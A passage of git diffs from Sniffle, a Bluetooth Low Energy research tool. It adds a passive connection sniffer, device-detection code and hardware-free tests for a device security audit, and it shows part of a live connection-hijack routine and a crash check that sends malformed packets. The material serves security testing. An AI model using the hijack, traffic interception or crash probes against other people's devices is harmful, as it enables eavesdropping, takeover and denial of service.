     tx_power = kw.pop('tx_power', 5)
 
     # No MAC filter: cmd_mac() is called with no argument (clears any filter).
-    # hop3 must be False — setup_sniffer raises UsageError if hop3=True and
+    # hop3 must be False - setup_sniffer raises UsageError if hop3=True and
     # targ_mac is None.
     hw.setup_sniffer(
         mode=SnifferMode.CONN_FOLLOW,
@@ -142,7 +142,7 @@ def follow_session(hw, advchan=37, **kw):
 
     if posture.encrypted:
         raise RuntimeError(
-            "follow_session: connection is encrypted — cannot hijack")
+            "follow_session: connection is encrypted - cannot hijack")
 
     hw.cmd_tx_power(tx_power)
     hw.cmd_hijack_live()
@@ -177,7 +177,7 @@ def _stabilize(hw, n, posture):
         try:
             msg = hw.recv_and_decode()
         except SerialTimeoutException:
-            continue  # no data this interval — re-check the deadline
+            continue  # no data this interval - re-check the deadline
         if msg is None:
             continue
         if isinstance(msg, PacketMessage):

--- a/python_cli/sniffle/sniff.py
+++ b/python_cli/sniffle/sniff.py
@@ -1,5 +1,5 @@
 """
-sniff.py — passive ATT sniffer: follow a live BLE connection and print every
+sniff.py - passive ATT sniffer: follow a live BLE connection and print every
 ATT read/write/notify/indicate operation seen on the air.
 
 This is purely passive (no hijack, no transmit).  It mirrors the CONN_FOLLOW
@@ -17,7 +17,7 @@ from . import att, gatt
 
 
 # ---------------------------------------------------------------------------
-# Pure formatter — no I/O, easy to unit-test
+# Pure formatter - no I/O, easy to unit-test
 # ---------------------------------------------------------------------------
 
 def _printable(b: bytes) -> str:
@@ -47,7 +47,7 @@ def format_att_op(att_pdu: bytes, is_p_to_c: bool, read_handle=None):
     Returns (line: str, new_read_handle: int | None) where *new_read_handle*
     is the handle to remember for correlating the next Read Response (or None).
 
-    *is_p_to_c*: True if the direction is Peripheral→Central.
+    *is_p_to_c*: True if the direction is Peripheral->Central.
     *read_handle*: the handle from the last observed Read Request (may be None).
     """
     if not att_pdu:
@@ -56,8 +56,8 @@ def format_att_op(att_pdu: bytes, is_p_to_c: bool, read_handle=None):
     opcode = att_pdu[0]
     payload = att_pdu[1:]
 
-    c2p = "C→P"   # C→P
-    p2c = "P→C"   # P→C
+    c2p = "C->P"   # C->P
+    p2c = "P->C"   # P->C
     direction = p2c if is_p_to_c else c2p
 
     # ------------------------------------------------------------------ helpers
@@ -175,7 +175,7 @@ def format_att_op(att_pdu: bytes, is_p_to_c: bool, read_handle=None):
 
 
 # ---------------------------------------------------------------------------
-# Hardware follow loop — passive, no transmit
+# Hardware follow loop - passive, no transmit
 # ---------------------------------------------------------------------------
 
 def sniff_connection(hw, target_mac, advchan=37, duration=None, on_op=None,
@@ -193,7 +193,7 @@ def sniff_connection(hw, target_mac, advchan=37, duration=None, on_op=None,
     if on_op is None:
         on_op = print
 
-    # Passive CONN_FOLLOW — exactly like hijack_session phase-1 but we stop here.
+    # Passive CONN_FOLLOW - exactly like hijack_session phase-1 but we stop here.
     hw.setup_sniffer(
         mode=SnifferMode.CONN_FOLLOW,
         chan=advchan,
@@ -224,7 +224,7 @@ def sniff_connection(hw, target_mac, advchan=37, duration=None, on_op=None,
 
             # Surface connection events to the caller
             if isinstance(msg, ConnectIndMessage):
-                on_op("[~] CONNECT_IND detected — following connection")
+                on_op("[~] CONNECT_IND detected - following connection")
 
             # Feed every packet to pcap if requested
             if pcap_writer is not None and isinstance(msg, PacketMessage):
@@ -235,12 +235,12 @@ def sniff_connection(hw, target_mac, advchan=37, duration=None, on_op=None,
 
             # Link-layer control: surface the peer's controller identity. An
             # LL_VERSION_IND carries the Bluetooth SIG Company Identifier of the
-            # BLE controller (silicon/stack vendor) — obtainable here without ever
+            # BLE controller (silicon/stack vendor) - obtainable here without ever
             # connecting ourselves, just by following the connection on the air.
             if isinstance(msg, LlControlMessage) and msg.opcode == LL_VERSION_IND:
                 v = parse_ll_version_ind(msg.body)
                 if v is not None:
-                    side = "P→C" if msg.data_dir == 1 else "C→P"
+                    side = "P->C" if msg.data_dir == 1 else "C->P"
                     on_op("[~] %s controller (LL_VERSION_IND): %s" % (side, v))
                 continue
 

--- a/python_cli/sniffle/sniff.py
+++ b/python_cli/sniffle/sniff.py
@@ -1,0 +1,260 @@
+"""
+sniff.py — passive ATT sniffer: follow a live BLE connection and print every
+ATT read/write/notify/indicate operation seen on the air.
+
+This is purely passive (no hijack, no transmit).  It mirrors the CONN_FOLLOW
+setup from hijack_session() but never calls cmd_hijack_live().
+"""
+
+import time as _time
+from serial import SerialTimeoutException
+
+from .constants import SnifferMode
+from .packet_decoder import DataMessage, ConnectIndMessage, PacketMessage, LlControlMessage
+from .sniffer_state import StateMessage, SnifferState
+from .ll_version import parse_ll_version_ind, LL_VERSION_IND
+from . import att, gatt
+
+
+# ---------------------------------------------------------------------------
+# Pure formatter — no I/O, easy to unit-test
+# ---------------------------------------------------------------------------
+
+def _printable(b: bytes) -> str:
+    """Return an ASCII representation of *b*, replacing non-printable bytes
+    with '.'."""
+    return ''.join(chr(x) if 32 <= x < 127 else '.' for x in b)
+
+
+def _hex_spaced(b: bytes) -> str:
+    """Return bytes as space-separated hex, e.g. '7e 07 05'."""
+    return ' '.join('%02x' % x for x in b)
+
+
+def _fmt_uuid(u) -> str:
+    """Render a parsed UUID the way the rest of the tool does: 16-bit UUIDs as
+    '0xFFF3' (with a friendly name when known), 128-bit UUIDs as their hex
+    string. *u* is an int (16-bit) or a hex str (128-bit), per att.parse_uuid."""
+    if isinstance(u, int):
+        name = gatt.UUID_NAMES.get(u)
+        return "0x%04X%s" % (u, " (%s)" % name if name else "")
+    return "0x%s" % u
+
+
+def format_att_op(att_pdu: bytes, is_p_to_c: bool, read_handle=None):
+    """Format one ATT PDU as a readable one-liner.
+
+    Returns (line: str, new_read_handle: int | None) where *new_read_handle*
+    is the handle to remember for correlating the next Read Response (or None).
+
+    *is_p_to_c*: True if the direction is Peripheral→Central.
+    *read_handle*: the handle from the last observed Read Request (may be None).
+    """
+    if not att_pdu:
+        return ("?? ATT  <empty>", read_handle)
+
+    opcode = att_pdu[0]
+    payload = att_pdu[1:]
+
+    c2p = "C→P"   # C→P
+    p2c = "P→C"   # P→C
+    direction = p2c if is_p_to_c else c2p
+
+    # ------------------------------------------------------------------ helpers
+    def _handle_value_line(label: str) -> tuple:
+        """Parse a PDU of form: opcode handle(2) value(...)."""
+        if len(payload) < 2:
+            return ("%s  %-10s <short PDU>" % (direction, label), None)
+        import struct
+        handle = struct.unpack('<H', payload[:2])[0]
+        value = payload[2:]
+        line = '%s  %-10s 0x%04X = %s  "%s"' % (
+            direction, label, handle, _hex_spaced(value), _printable(value))
+        return (line, None)
+
+    # ---------------------------------------------------------------- opcodes
+    if opcode == att.ATT_WRITE_CMD:          # 0x52
+        import struct
+        if len(payload) < 2:
+            return ("%s  WRITE-CMD  <short PDU>" % direction, None)
+        handle = struct.unpack('<H', payload[:2])[0]
+        value = payload[2:]
+        line = '%s  WRITE-CMD  0x%04X = %s  "%s"' % (
+            direction, handle, _hex_spaced(value), _printable(value))
+        return (line, None)
+
+    elif opcode == att.ATT_WRITE_REQ:        # 0x12
+        import struct
+        if len(payload) < 2:
+            return ("%s  WRITE-REQ  <short PDU>" % direction, None)
+        handle = struct.unpack('<H', payload[:2])[0]
+        value = payload[2:]
+        line = '%s  WRITE-REQ  0x%04X = %s  "%s"' % (
+            direction, handle, _hex_spaced(value), _printable(value))
+        return (line, None)
+
+    elif opcode == att.ATT_WRITE_RSP:        # 0x13
+        return ("%s  WRITE-RSP  ok" % direction, None)
+
+    elif opcode == att.ATT_READ_REQ:         # 0x0A
+        import struct
+        if len(payload) < 2:
+            return ("%s  READ-REQ   <short PDU>" % direction, None)
+        handle = struct.unpack('<H', payload[:2])[0]
+        line = "%s  READ-REQ   0x%04X" % (direction, handle)
+        return (line, handle)   # remember for the coming Read Response
+
+    elif opcode == att.ATT_READ_RSP:         # 0x0B
+        value = payload
+        h_str = ("0x%04X" % read_handle) if read_handle is not None else "0x????"
+        line = '%s  READ-RSP   %s = %s  "%s"' % (
+            direction, h_str, _hex_spaced(value), _printable(value))
+        return (line, None)     # correlation consumed
+
+    elif opcode == att.ATT_HANDLE_VALUE_NTF: # 0x1B
+        line, _ = _handle_value_line("NOTIFY")
+        return (line, read_handle)
+
+    elif opcode == att.ATT_HANDLE_VALUE_IND: # 0x1D
+        line, _ = _handle_value_line("INDICATE")
+        return (line, read_handle)
+
+    elif opcode == att.ATT_READ_BY_GROUP_REQ:  # 0x10
+        return ("%s  DISCOVER services (req)" % direction, read_handle)
+
+    elif opcode == att.ATT_READ_BY_GROUP_RSP:  # 0x11
+        try:
+            entries = att.parse_read_by_group_rsp(att_pdu)
+            summaries = ["0x%04X-0x%04X %s" % (s, e, _fmt_uuid(uuid))
+                         for s, e, uuid in entries]
+            line = "%s  DISCOVER services (rsp) [%s]" % (direction, "; ".join(summaries))
+        except Exception:
+            line = "%s  DISCOVER services (rsp) <decode error>" % direction
+        return (line, read_handle)
+
+    elif opcode == att.ATT_READ_BY_TYPE_REQ:   # 0x08
+        return ("%s  DISCOVER characteristics (req)" % direction, read_handle)
+
+    elif opcode == att.ATT_READ_BY_TYPE_RSP:   # 0x09
+        try:
+            entries = att.parse_read_by_type_rsp(att_pdu)
+            summaries = ["decl=0x%04X val=0x%04X %s" % (d, v, _fmt_uuid(u))
+                         for d, _, v, u in entries]
+            line = "%s  DISCOVER characteristics (rsp) [%s]" % (
+                direction, "; ".join(summaries))
+        except Exception:
+            line = "%s  DISCOVER characteristics (rsp) <decode error>" % direction
+        return (line, read_handle)
+
+    elif opcode == att.ATT_FIND_INFO_REQ:      # 0x04
+        return ("%s  DISCOVER descriptors (req)" % direction, read_handle)
+
+    elif opcode == att.ATT_FIND_INFO_RSP:      # 0x05
+        try:
+            entries = att.parse_find_info_rsp(att_pdu)
+            summaries = ["0x%04X=%s" % (h, _fmt_uuid(u)) for h, u in entries]
+            line = "%s  DISCOVER descriptors (rsp) [%s]" % (
+                direction, "; ".join(summaries))
+        except Exception:
+            line = "%s  DISCOVER descriptors (rsp) <decode error>" % direction
+        return (line, read_handle)
+
+    elif opcode == att.ATT_ERROR_RSP:          # 0x01
+        if len(payload) < 4:
+            return ("%s  ERROR  <short PDU>" % direction, read_handle)
+        import struct
+        req_op, handle, err_code = struct.unpack('<BHB', payload[:4])
+        err_name = att.att_error_name(err_code)
+        line = "%s  ERROR  req 0x%02X handle 0x%04X: %s" % (
+            direction, req_op, handle, err_name)
+        return (line, read_handle)
+
+    else:
+        line = "%s  ATT 0x%02X  %s" % (direction, opcode, _hex_spaced(payload))
+        return (line, read_handle)
+
+
+# ---------------------------------------------------------------------------
+# Hardware follow loop — passive, no transmit
+# ---------------------------------------------------------------------------
+
+def sniff_connection(hw, target_mac, advchan=37, duration=None, on_op=None,
+                     pcap_writer=None):
+    """Follow the live connection to *target_mac* (passive) and call
+    *on_op(line)* for each decoded ATT operation.
+
+    Runs until *duration* seconds elapse (None = until Ctrl-C /
+    KeyboardInterrupt).  Mirrors hijack_session's CONN_FOLLOW setup but never
+    transmits.  Feeds packets to *pcap_writer* if given.
+
+    *target_mac*: 6-byte list, little-endian (e.g. [0xFF,0xEE,...,0xAA]).
+    *advchan*: primary advertising channel to listen on (37/38/39).
+    """
+    if on_op is None:
+        on_op = print
+
+    # Passive CONN_FOLLOW — exactly like hijack_session phase-1 but we stop here.
+    hw.setup_sniffer(
+        mode=SnifferMode.CONN_FOLLOW,
+        chan=advchan,
+        targ_mac=target_mac,
+        hop3=True,
+        rssi_min=-128,
+    )
+    # Instahop: jump to the data channel as soon as we see a CONNECT_IND.
+    hw.cmd_instahop(True)
+    # Zero timestamps and flush any buffered stale packets.
+    hw.mark_and_flush()
+
+    read_handle = None
+    deadline = (_time.time() + duration) if duration is not None else None
+
+    try:
+        while True:
+            if deadline is not None and _time.time() >= deadline:
+                break
+
+            try:
+                msg = hw.recv_and_decode()
+            except SerialTimeoutException:
+                continue
+
+            if msg is None:
+                continue
+
+            # Surface connection events to the caller
+            if isinstance(msg, ConnectIndMessage):
+                on_op("[~] CONNECT_IND detected — following connection")
+
+            # Feed every packet to pcap if requested
+            if pcap_writer is not None and isinstance(msg, PacketMessage):
+                try:
+                    pcap_writer.write_packet_message(msg)
+                except Exception:
+                    pass
+
+            # Link-layer control: surface the peer's controller identity. An
+            # LL_VERSION_IND carries the Bluetooth SIG Company Identifier of the
+            # BLE controller (silicon/stack vendor) — obtainable here without ever
+            # connecting ourselves, just by following the connection on the air.
+            if isinstance(msg, LlControlMessage) and msg.opcode == LL_VERSION_IND:
+                v = parse_ll_version_ind(msg.body)
+                if v is not None:
+                    side = "P→C" if msg.data_dir == 1 else "C→P"
+                    on_op("[~] %s controller (LL_VERSION_IND): %s" % (side, v))
+                continue
+
+            # Only data PDUs carry ATT traffic
+            if not isinstance(msg, DataMessage):
+                continue
+
+            att_pdu = att.extract_att(msg.body)
+            if att_pdu is None:
+                continue
+
+            is_p_to_c = (msg.data_dir == 1)
+            line, read_handle = format_att_op(att_pdu, is_p_to_c, read_handle)
+            on_op(line)
+
+    except KeyboardInterrupt:
+        pass

--- a/python_cli/sniffle/sniffle_hw.py
+++ b/python_cli/sniffle/sniffle_hw.py
@@ -39,11 +39,16 @@ class TrivialLogger:
     exception = _log
 
 def find_catsniffer_v3_serport():
-    catsniffer_ports = [i[0] for i in comports() if (i.vid == 11914 and i.pid == 192 and i.manufacturer.lower() == "arduino")]
-    if len(catsniffer_ports) > 0:
-        return catsniffer_ports[0]
-    else:
-        return None
+    # Electronic Cats CatSniffer (RP2040 composite USB): vid 0x1209, product
+    # "Catsniffer". It exposes several CDC interfaces; the lowest-numbered one is
+    # the CC1352 passthrough that Sniffle talks to.
+    ports = [i.device for i in comports()
+             if i.product and "catsniffer" in i.product.lower()]
+    # Legacy Arduino-based CatSniffer variant (vid 0x2E8A / pid 0xC0).
+    ports += [i.device for i in comports()
+              if i.vid == 11914 and i.pid == 192
+              and i.manufacturer and i.manufacturer.lower() == "arduino"]
+    return sorted(set(ports))[0] if ports else None
 
 def find_xds110_serport():
     xds_ports = [i[0] for i in comports() if (i.vid == 0x0451 and i.pid == 0xBEF3)]

--- a/python_cli/tests/test_att.py
+++ b/python_cli/tests/test_att.py
@@ -1,0 +1,34 @@
+from sniffle import att
+
+def test_read_by_group_req_roundtrip():
+    pdu = att.build_read_by_group_req(0x0001, 0xFFFF, att.GATT_PRIMARY_SERVICE)
+    assert pdu == bytes.fromhex("100100ffff0028")
+
+def test_parse_read_by_group_rsp():
+    # each_len=6: [start,end,uuid16] x2  (1800 @ 1-7, 1801 @ 8-b)
+    pdu = bytes.fromhex("110601000700001808000b000118")
+    entries = att.parse_read_by_group_rsp(pdu)
+    assert entries == [(0x0001, 0x0007, 0x1800), (0x0008, 0x000b, 0x1801)]
+
+def test_parse_read_by_type_rsp_char():
+    # each_len=7: decl(2) props(1) vhandle(2) uuid16(2)
+    pdu = bytes.fromhex("09070d00100e00f3ff")
+    assert att.parse_read_by_type_rsp(pdu) == [(0x000d, 0x10, 0x000e, 0xFFF3)]
+
+def test_parse_error_rsp():
+    pdu = bytes.fromhex("011001000a")  # err to ReadByGroup, handle 1, Attr Not Found
+    assert att.parse_error_rsp(pdu) == (0x10, 0x0001, 0x0A)
+
+def test_extract_att_from_data_pdu():
+    # LL header(0x02) len(0x07) | L2CAP len=0x0003 cid=0x0004 | ATT 0x0a 0x0300
+    body = bytes.fromhex("0207030004000a0300")
+    assert att.extract_att(body) == bytes.fromhex("0a0300")
+
+def test_extract_att_non_att_cid_returns_none():
+    body = bytes.fromhex("0207030006000a0300")  # CID 0x0006 (SMP)
+    assert att.extract_att(body) is None
+
+def test_parse_uuid_16_and_128():
+    assert att.parse_uuid(bytes.fromhex("0018")) == 0x1800
+    u = bytes(range(16))
+    assert att.parse_uuid(u) == u[::-1].hex()

--- a/python_cli/tests/test_audit.py
+++ b/python_cli/tests/test_audit.py
@@ -1,11 +1,11 @@
 """
-test_audit.py — hardware-free unit + integration tests for sniffle/audit.py.
+test_audit.py - hardware-free unit + integration tests for sniffle/audit.py.
 
 Reuses the SimHW + FakeGattDB pattern from test_integration.py.
 Extended FakeGattDB variants cover:
-  • requires_auth — reads return ATT Error 0x05 (Insufficient Authentication)
-  • a writable control char (0xFFF3) — already in base FakeGattDB
-  • a writable 0xFE59 char for DFU check
+  * requires_auth - reads return ATT Error 0x05 (Insufficient Authentication)
+  * a writable control char (0xFFF3) - already in base FakeGattDB
+  * a writable 0xFE59 char for DFU check
 
 All tests run without any physical hardware.
 """
@@ -51,9 +51,9 @@ def make_l2cap_packet(payload, cid, p_to_c=True):
 class FakeGattDB:
     """Base GATT DB identical to test_integration.py:
 
-    Service 0x1800 (Generic Access)  handles 0x0001–0x0005
+    Service 0x1800 (Generic Access)  handles 0x0001-0x0005
       char 0x2A00  props=R(0x02)  value_handle=0x0003  value=b"SIMDEV"
-    Service 0xFFF0 (Vendor)          handles 0x0006–0x000F
+    Service 0xFFF0 (Vendor)          handles 0x0006-0x000F
       char 0xFFF3  props=W|Wnr(0x0C)  value_handle=0x0008
       char 0xFFF4  props=N(0x10)       value_handle=0x000B
     """
@@ -175,7 +175,7 @@ class FakeGattDB:
 class FakeGattDBWithDFU(FakeGattDB):
     """Extended DB that adds a writable 0xFE59 (Nordic Secure DFU) characteristic.
 
-    Service 0xFE50  handles 0x0010–0x001F
+    Service 0xFE50  handles 0x0010-0x001F
       char 0xFE59  props=W(0x08)  value_handle=0x0012  (DFU control point)
     """
     SERVICES = FakeGattDB.SERVICES + [(0x0010, 0x001F, 0xFE50)]
@@ -191,16 +191,16 @@ class FakeGattDBWithDFU(FakeGattDB):
 
 
 # ---------------------------------------------------------------------------
-# SimHW — simulated Sniffle hardware (mirrors test_integration.py)
+# SimHW - simulated Sniffle hardware (mirrors test_integration.py)
 # ---------------------------------------------------------------------------
 
 class SimHW:
     """Minimal Sniffle hardware simulator backed by a FakeGattDB.
 
     Extended for pass 2:
-      smp_authreq  — AuthReq byte to include in a Pairing Response when a
+      smp_authreq  - AuthReq byte to include in a Pairing Response when a
                      Pairing Request arrives on CID 0x0006 (None = no reply).
-      fragile      — when True, the sim drops the link (sends a non-CENTRAL
+      fragile      - when True, the sim drops the link (sends a non-CENTRAL
                      StateMessage) the first time a malformed/unknown ATT opcode
                      or an LL control PDU (llid==3) is received.
     """
@@ -239,7 +239,7 @@ class SimHW:
     def cmd_transmit(self, llid, pdu, event=0):
         self.sent.append((llid, bytes(pdu)))
 
-        # LL control PDU (LLID=3) — fragile sim drops the link
+        # LL control PDU (LLID=3) - fragile sim drops the link
         if llid == 3:
             if self.fragile:
                 self._drop_link()
@@ -257,7 +257,7 @@ class SimHW:
         payload = pdu_bytes[4:4 + l2cap_len]
 
         if cid == att.SMP_CID:
-            # SMP PDU — check if it's a Pairing Request
+            # SMP PDU - check if it's a Pairing Request
             if payload and payload[0] == SMP_PAIRING_REQ and self.smp_authreq is not None:
                 # Build Pairing Response: code(0x02), IO_cap, OOB, AuthReq, MaxKeySize, IKD, RKD
                 smp_rsp = bytes([SMP_PAIRING_RSP, 0x03, 0x00, self.smp_authreq, 0x10, 0x00, 0x00])
@@ -304,11 +304,11 @@ def _make_device(mac="AA:BB:CC:DD:EE:FF", name="SIMDEV",
 
 
 # ---------------------------------------------------------------------------
-# Tests — check_trackability (Check C)
+# Tests - check_trackability (Check C)
 # ---------------------------------------------------------------------------
 
 def test_check_trackability_public():
-    """Public address → LOW 'trackable' finding."""
+    """Public address -> LOW 'trackable' finding."""
     device = _make_device(addr_type="Public")
     findings = check_trackability(device)
     assert len(findings) == 1
@@ -319,7 +319,7 @@ def test_check_trackability_public():
 
 
 def test_check_trackability_static():
-    """Static random address → LOW 'trackable' finding."""
+    """Static random address -> LOW 'trackable' finding."""
     device = _make_device(addr_type="Static")
     findings = check_trackability(device)
     assert len(findings) == 1
@@ -328,29 +328,29 @@ def test_check_trackability_static():
 
 
 def test_check_trackability_rpa():
-    """RPA → no finding (rotates → not trackable)."""
+    """RPA -> no finding (rotates -> not trackable)."""
     device = _make_device(addr_type="RPA")
     assert check_trackability(device) == []
 
 
 def test_check_trackability_nrpa():
-    """NRPA → no finding."""
+    """NRPA -> no finding."""
     device = _make_device(addr_type="NRPA")
     assert check_trackability(device) == []
 
 
 def test_check_trackability_random():
-    """Generic 'Random' → no finding (treated as non-persistent)."""
+    """Generic 'Random' -> no finding (treated as non-persistent)."""
     device = _make_device(addr_type="Random")
     assert check_trackability(device) == []
 
 
 # ---------------------------------------------------------------------------
-# Tests — check_sensitive_chars (Check D)
+# Tests - check_sensitive_chars (Check D)
 # ---------------------------------------------------------------------------
 
 def test_check_sensitive_chars_dfu_uuid():
-    """A writable 0xFE59 char → HIGH 'dfu-writable' finding."""
+    """A writable 0xFE59 char -> HIGH 'dfu-writable' finding."""
     db = FakeGattDBWithDFU()
     hw = SimHW(db)
     link = connect_session(hw, [0] * 6, is_random=False, timeout=5)
@@ -367,7 +367,7 @@ def test_check_sensitive_chars_dfu_uuid():
 
 
 def test_check_sensitive_chars_name_hint():
-    """A device named 'My DFU Device' with a writable char → HIGH 'dfu-writable'."""
+    """A device named 'My DFU Device' with a writable char -> HIGH 'dfu-writable'."""
     db = FakeGattDB()   # has writable 0xFFF3
     hw = SimHW(db)
     link = connect_session(hw, [0] * 6, is_random=False, timeout=5)
@@ -384,7 +384,7 @@ def test_check_sensitive_chars_name_hint():
 
 
 def test_check_sensitive_chars_no_hit():
-    """Ordinary writable char with no DFU name/UUID → no dfu-writable finding."""
+    """Ordinary writable char with no DFU name/UUID -> no dfu-writable finding."""
     db = FakeGattDB()
     hw = SimHW(db)
     link = connect_session(hw, [0] * 6, is_random=False, timeout=5)
@@ -399,11 +399,11 @@ def test_check_sensitive_chars_no_hit():
 
 
 # ---------------------------------------------------------------------------
-# Tests — audit_device integration (via SimHW)
+# Tests - audit_device integration (via SimHW)
 # ---------------------------------------------------------------------------
 
 def test_audit_open_device_flags_high():
-    """Open DB (writable char, reads succeed) → HIGH no-encryption + HIGH open-control."""
+    """Open DB (writable char, reads succeed) -> HIGH no-encryption + HIGH open-control."""
     db = FakeGattDB(requires_auth=False)
     hw = SimHW(db)
     device = _make_device()
@@ -419,7 +419,7 @@ def test_audit_open_device_flags_high():
 
 
 def test_audit_encrypted_device_no_open_finding():
-    """DB with requires_auth=True → no HIGH no-encryption/open-control; gets INFO encrypted."""
+    """DB with requires_auth=True -> no HIGH no-encryption/open-control; gets INFO encrypted."""
     db = FakeGattDB(requires_auth=True)
     hw = SimHW(db)
     device = _make_device()
@@ -439,7 +439,7 @@ def test_audit_encrypted_device_no_open_finding():
 
 
 def test_audit_includes_trackability():
-    """A Public device → trackability finding is included in audit_device results."""
+    """A Public device -> trackability finding is included in audit_device results."""
     db = FakeGattDB(requires_auth=False)
     hw = SimHW(db)
     device = _make_device(addr_type="Public")
@@ -451,7 +451,7 @@ def test_audit_includes_trackability():
 
 
 def test_audit_dfu_device():
-    """DB with writable 0xFE59 char → HIGH dfu-writable."""
+    """DB with writable 0xFE59 char -> HIGH dfu-writable."""
     db = FakeGattDBWithDFU(requires_auth=False)
     hw = SimHW(db)
     device = _make_device()
@@ -463,7 +463,7 @@ def test_audit_dfu_device():
 
 
 # ---------------------------------------------------------------------------
-# Tests — render_audit
+# Tests - render_audit
 # ---------------------------------------------------------------------------
 
 def test_render_audit_verdict_vulnerable():
@@ -511,11 +511,11 @@ def test_render_audit_shows_mac_and_name():
 
 
 # ---------------------------------------------------------------------------
-# Tests — findings sorted by severity
+# Tests - findings sorted by severity
 # ---------------------------------------------------------------------------
 
 def test_audit_findings_sorted():
-    """audit_device returns findings sorted HIGH → MEDIUM → LOW → INFO."""
+    """audit_device returns findings sorted HIGH -> MEDIUM -> LOW -> INFO."""
     from sniffle.audit import _SEV_ORDER as _SO
     db = FakeGattDB(requires_auth=False)
     hw = SimHW(db)
@@ -528,11 +528,11 @@ def test_audit_findings_sorted():
 
 
 # ---------------------------------------------------------------------------
-# Tests — check_pairing (Check B) via SimHW
+# Tests - check_pairing (Check B) via SimHW
 # ---------------------------------------------------------------------------
 
 def test_check_pairing_legacy():
-    """Peripheral responds with AuthReq lacking SC bit → HIGH 'legacy-pairing'."""
+    """Peripheral responds with AuthReq lacking SC bit -> HIGH 'legacy-pairing'."""
     # AuthReq = 0x04 (MITM only, no SC)
     db = FakeGattDB(requires_auth=False)
     hw = SimHW(db, smp_authreq=AUTHREQ_MITM)   # SC not set
@@ -548,7 +548,7 @@ def test_check_pairing_legacy():
 
 
 def test_check_pairing_justworks():
-    """Peripheral AuthReq has SC but not MITM → MEDIUM 'just-works'."""
+    """Peripheral AuthReq has SC but not MITM -> MEDIUM 'just-works'."""
     # AuthReq = 0x08 (SC only, no MITM)
     db = FakeGattDB(requires_auth=False)
     hw = SimHW(db, smp_authreq=AUTHREQ_SC)   # SC set, MITM not set
@@ -566,7 +566,7 @@ def test_check_pairing_justworks():
 
 
 def test_check_pairing_secure():
-    """Peripheral AuthReq has SC+MITM → INFO 'pairing-ok', no HIGH/MEDIUM."""
+    """Peripheral AuthReq has SC+MITM -> INFO 'pairing-ok', no HIGH/MEDIUM."""
     # AuthReq = 0x0C (SC | MITM)
     db = FakeGattDB(requires_auth=False)
     hw = SimHW(db, smp_authreq=AUTHREQ_SC | AUTHREQ_MITM)
@@ -584,11 +584,11 @@ def test_check_pairing_secure():
 
 
 # ---------------------------------------------------------------------------
-# Tests — check_crash (Check E) via SimHW with fragile flag
+# Tests - check_crash (Check E) via SimHW with fragile flag
 # ---------------------------------------------------------------------------
 
 def test_check_crash_detects_drop():
-    """Aggressive audit on a fragile sim → HIGH 'crash' finding."""
+    """Aggressive audit on a fragile sim -> HIGH 'crash' finding."""
     db = FakeGattDB(requires_auth=False)
     hw = SimHW(db, fragile=True)
     link = connect_session(hw, [0] * 6, is_random=False, timeout=5)
@@ -604,7 +604,7 @@ def test_check_crash_detects_drop():
 
 
 def test_check_crash_no_finding_robust():
-    """check_crash on a robust (non-fragile) sim → no crash finding."""
+    """check_crash on a robust (non-fragile) sim -> no crash finding."""
     db = FakeGattDB(requires_auth=False)
     hw = SimHW(db, fragile=False)
     link = connect_session(hw, [0] * 6, is_random=False, timeout=5)
@@ -622,13 +622,13 @@ def test_check_crash_no_finding_robust():
 
 
 # ---------------------------------------------------------------------------
-# Tests — full audit_device with pairing check included
+# Tests - full audit_device with pairing check included
 # ---------------------------------------------------------------------------
 
 def test_audit_device_includes_pairing():
     """Full audit_device on an open+legacy sim returns both open-control HIGH
     and legacy-pairing HIGH findings."""
-    # smp_authreq=0x00 → no SC, no MITM → both legacy-pairing HIGH and just-works MEDIUM
+    # smp_authreq=0x00 -> no SC, no MITM -> both legacy-pairing HIGH and just-works MEDIUM
     db = FakeGattDB(requires_auth=False)
     hw = SimHW(db, smp_authreq=0x00)
     device = _make_device()
@@ -647,7 +647,7 @@ def test_audit_device_findings_sorted_with_pairing():
     """audit_device with pairing findings still returns results sorted by severity."""
     from sniffle.audit import _SEV_ORDER as _SO
     db = FakeGattDB(requires_auth=False)
-    hw = SimHW(db, smp_authreq=AUTHREQ_SC)   # SC only → MEDIUM just-works
+    hw = SimHW(db, smp_authreq=AUTHREQ_SC)   # SC only -> MEDIUM just-works
     device = _make_device(addr_type="Public")  # adds LOW trackable
 
     findings = audit_device(hw, device)
@@ -677,7 +677,7 @@ def test_audit_device_non_connectable_does_not_connect(monkeypatch):
 
 def test_audit_device_non_connectable_static_still_trackable(monkeypatch):
     """A non-connectable advertiser with a persistent (Static) address is still
-    flagged as trackable — the passive check C runs without a connection."""
+    flagged as trackable - the passive check C runs without a connection."""
     monkeypatch.setattr(
         "sniffle.audit.connect_session",
         lambda *a, **k: (_ for _ in ()).throw(AssertionError("must not connect")))

--- a/python_cli/tests/test_audit.py
+++ b/python_cli/tests/test_audit.py
@@ -1,0 +1,690 @@
+"""
+test_audit.py — hardware-free unit + integration tests for sniffle/audit.py.
+
+Reuses the SimHW + FakeGattDB pattern from test_integration.py.
+Extended FakeGattDB variants cover:
+  • requires_auth — reads return ATT Error 0x05 (Insufficient Authentication)
+  • a writable control char (0xFFF3) — already in base FakeGattDB
+  • a writable 0xFE59 char for DFU check
+
+All tests run without any physical hardware.
+"""
+import struct, queue, sys, os
+import pytest
+
+sys.path.insert(0, os.path.join(os.path.dirname(__file__), ".."))
+
+from serial import SerialTimeoutException
+from sniffle.sniffer_state import StateMessage, SnifferState
+from sniffle.decoder_state import SniffleDecoderState
+from sniffle import att
+from sniffle.session import connect_session
+from sniffle.gatt import GattClient
+from sniffle.recon import Device
+from sniffle.audit import (
+    Finding, HIGH, MEDIUM, LOW, INFO,
+    check_trackability, check_open_control, check_sensitive_chars,
+    audit_device, render_audit,
+    check_pairing, check_crash,
+    SMP_PAIRING_REQ, SMP_PAIRING_RSP, SMP_PAIRING_FAILED,
+    AUTHREQ_MITM, AUTHREQ_SC,
+)
+from sniffle.packet_decoder import PacketMessage
+
+# Import the conftest helper (same directory structure as test_integration.py)
+from conftest import make_att_packet
+
+
+def make_l2cap_packet(payload, cid, p_to_c=True):
+    """Build a PacketMessage carrying a raw L2CAP payload on the given CID,
+    using the same LL framing as make_att_packet but with an arbitrary CID."""
+    l2cap = att.l2cap_wrap(payload, cid=cid)
+    ll_hdr = bytes([0x02, len(l2cap)])
+    body = ll_hdr + l2cap
+    return PacketMessage.from_body(body, is_data=True, peripheral_send=p_to_c)
+
+
+# ---------------------------------------------------------------------------
+# FakeGattDB variants
+# ---------------------------------------------------------------------------
+
+class FakeGattDB:
+    """Base GATT DB identical to test_integration.py:
+
+    Service 0x1800 (Generic Access)  handles 0x0001–0x0005
